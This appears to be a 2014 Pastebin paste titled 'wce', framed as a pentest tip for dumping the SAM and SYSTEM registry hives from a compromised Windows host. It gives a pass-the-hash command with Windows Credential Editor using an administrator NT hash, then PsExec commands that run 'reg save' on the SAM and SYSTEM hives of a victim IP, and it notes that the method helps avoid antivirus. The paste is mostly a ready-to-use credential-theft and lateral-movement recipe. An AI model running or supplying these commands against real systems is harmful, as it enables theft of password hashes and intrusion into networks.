Advertisement
opexxx

wce

Jul 16th, 2014
352
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.76 KB | None | 0 0
  1.  This command came in very handy on a recent pentest. Essentially this allows us to dump out the SAM and SYSTEM files on a compromised host, whilst also helping avoid A/V. It should be noted that this is a post exploitation task and assumes you have SYSTEM access to the host/or are using a privileged hash to authenticate from a remote system.
  2.  
  3. If you wish to perform this attack remotely you’ll need the relevant hash and wce to perform the following command:
  4.  
  5. wce.exe -s administrator:500:LMHASH:NTHASH -c cmd.exe
  6.  
  7. Then in the spawned window you can use the following:
  8.  
  9. PsExec.exe \\%VICTIM_IP% reg save hklm\system %LOCATION% & PsExec.exe \\%VICTIM_IP% reg save hklm\sam %LOCATION%
  10.  
  11. If you have local access you can obviously drop the wce and psexec sections.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement